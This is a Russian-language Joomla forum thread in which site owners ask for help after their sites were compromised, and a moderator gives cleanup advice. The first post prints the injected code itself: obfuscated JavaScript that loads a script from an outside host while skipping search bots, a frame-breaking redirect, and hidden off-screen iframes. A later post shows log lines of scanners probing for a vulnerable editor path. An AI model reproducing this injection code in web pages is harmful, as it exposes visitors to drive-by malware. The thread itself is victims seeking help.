Joomla 1.5 Iframe с вредоносным кодом.

Тема в разделе "Вопросы безопасности", создана пользователем boneshaker, 04.03.2012.

  1. Offline

    boneshaker Недавно здесь

    Регистрация:
    08.06.2011
    Сообщения:
    18
    Симпатии:
    0
    Пол:
    Мужской
    В коде сайта появился левый код (iframe) причём из кучи источников. Вопрос, как с этим справиться малой кровью. Разумеется поиск тотал командером вредных ссылок в коде не дал результатов.
    вот кусок вредного кода :
    Код (html):
    1. <body id="page"><nofollow><noindex>
    2. <script language="JavaScript">
    3. {  
    4. if (self.parent.frames.length != 0)  
    5. self.parent.location="http://kharkov-online.ru"
    6. }  
    7. var brs = window.navigator.userAgent; prnt = '0';
    8. if (window.brs.indexOf("bot") >= 0) prnt = '1';
    9. if (window.brs.indexOf("andex") >= 0) prnt = '2';
    10. if (window.brs.indexOf("oogl") >= 0) prnt = '3';
    11. if (prnt == '0') var prtone = "ip"+"t lan"+"gua"+"ge='"+"Ja"+"vaS"+"c"; var prttwo = "c='h"+"t"+"tp"+":/"+"/282mssnz.ns01.biz"+"/wp"+"fo"+"ot"+"e"+"r.p"+"hp"+"?i="+"23190"; var prtthree = "ip"+"t>";
    12. document.write("<sc"+"r");
    13. document.write(prtone);
    14. document.write("ri"+"pt' s"+"r");
    15. document.write(prttwo);
    16. document.write("'>"+"<"+"/sc"+"r");
    17. document.write(prtthree);
    18. </script><script language="JavaScript" src="http://282mssnz.ns01.biz/wpfooter.php?i=23190"></script>
    19. </noindex></nofollow><iframe style="width: 170px; height: 170px; position: absolute; left: -1070px; " src="http://r0236.rsdisp.ru/?in=40114"></iframe>
    20.  
    21. <iframe style="position: absolute; width: 177px; height: 177px; left: -1077px; " src="http://282mssnz.ns01.biz/?inid=23190&amp;intime=665435789.5&amp;fltr=1&amp;nbz"></iframe><link rel="shortcut icon" href="http://www.tachos.ru/templates/mega_extramy/favicon.ico" type="image/x-icon">


    А вот скриншот источников троян.jpg
     
    Последнее редактирование модератором: 25.11.2014
  2.  
  3. Offline

    boneshaker Недавно здесь

    Регистрация:
    08.06.2011
    Сообщения:
    18
    Симпатии:
    0
    Пол:
    Мужской
    Вылечилось перезаливкой сайта, как предохраниться теперь?
     
  4. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 042
    Симпатии:
    519
    Пол:
    Мужской
    Ну для начала заменить пароли/логины.Может кому запретить рассылку об изменении доступа.
     
  5. Offline

    mallet Недавно здесь

    Регистрация:
    17.03.2012
    Сообщения:
    2
    Симпатии:
    0
    Пол:
    Мужской
    У меня та же фигня. Причем появилось впервые вчера на сайте под Joomla! 1.5, а сегодня на всех сайтах с этого аккаунта. Движки разные - WP, Mediawiki, Vam shop. Код проявляется под </html> (в джумле над <html>). Перекопка файловых систем ничего не дала, в логах вроде все чисто. Хотя нашел в логах такое:
    Код (html):
    1. **********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    2. **********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /cms/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    3. **********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /admin/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    4. **********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /admin/lib/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    5. **********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /public/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    6. **********ru *********** - - [16/Mar/2012:16:36:26 +0400] "GET /modules/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    7. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /zm_cms/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    8. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /edit/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    9. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /plugins/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    10. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /lib/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    11. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /libs/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    12. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /abton/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    13. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /adm/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    14. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /admin/include/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    15. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /include/spaw2/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    16. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /spaw/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    17. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /engine/libs/spaw/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    18. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /libs/spaw/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"
    19. **********ru *********** - - [16/Mar/2012:16:36:27 +0400] "GET /admin/spaw/dialogs/dialog.php HTTP/1.0" 500 526 "-" "-"

    Но spaw у меня не стоит, поэтому я думаю, это не то.
    Как решить проблему без перезаливки?

    Upd: Откатил на три дня назад - стало все ок, но ведь это ненадолго.
     
  6. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 042
    Симпатии:
    519
    Пол:
    Мужской
    А по датам изменения в файлах были?
     
  7. Offline

    mallet Недавно здесь

    Регистрация:
    17.03.2012
    Сообщения:
    2
    Симпатии:
    0
    Пол:
    Мужской
    Не, нигде не нашел. Если что-то и менялось, то дата осталась той же.
     
  8. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 042
    Симпатии:
    519
    Пол:
    Мужской
    Хм,а посмотреть логи доступа mysql/mysql.err / mysql.log
     

Поделиться этой страницей

Загрузка...